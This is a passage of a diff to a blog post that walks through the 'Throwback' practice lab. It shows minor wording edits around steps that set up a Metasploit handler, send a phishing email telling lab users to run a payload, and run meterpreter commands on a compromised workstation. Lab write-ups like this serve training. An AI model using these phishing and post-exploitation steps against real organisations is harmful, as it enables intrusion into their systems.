lolkatz/github-pages-with-jekyll/_posts/2021-03-11-pivoting-throwback-network.md

    LPORT     53               yes       The listen port
 ````

+You can keep the values of your parameters you set using _save_.
 To start the handler in the background: _exploit -j_

 Now let’s take a look the Throwback-MAIL website.

 ![Throwback hacks website](/github-pages-with-jekyll/assets/images/tb-mail.png)\
 Figure 4: Throwback mail website

 Conveniently, there is a guest account.
-Log in and you'll see that you have access to the address book.
+Log in and you'll see that you have access to an address book.
 Send everyone an email, urging them to execute your payload:

   ![Throwback hacks website](/github-pages-with-jekyll/assets/images/phishing-email.png)\
 Figure 4: A suspicious mail from IT

-## All the cool kids love Metasploit (and mimikatz)
+## All the cool kids love Metasploit

 In less then a minute I received a meterpreter shell.
 Let see what kind of session we are in using the following commands:

 ````
 meterpreter> getuid
 Server username: THROWBACK-WS01\BlaireJ

 meterpreter > sysinfo
 Computer: THROWBACK-WS01
 OS              : Windows 10 (10.0 Build 19041).